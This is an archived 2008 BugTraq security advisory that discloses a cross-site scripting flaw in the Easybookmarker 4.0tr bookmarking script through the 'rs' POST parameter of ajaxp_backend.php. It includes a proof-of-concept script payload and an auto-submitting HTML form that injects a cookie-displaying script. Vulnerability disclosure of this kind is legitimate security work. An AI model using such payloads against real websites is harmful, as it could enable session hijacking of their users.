BugTraq
Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani Jul 19 2008 12:22PM
irancrash gmail com
----------------------------------------------------------------

Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Offical Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

----------------------------------------------------------------

Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR

----------------------------------------------------------------

Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip

----------------------------------------------------------------
Xss Vulnerability :

Variable : rs
Send Method : POST

Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://example/zomplog/ajaxp_backend.php"

method="POST" name="form">

<input type="hidden" name="rs" value="" <script>alert(document.cookie)</script>">

</form>
</body>
</html>

----------------------------------------------------------------

Tnx : God

HTTP://IRCRASH.COM

----------------------------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus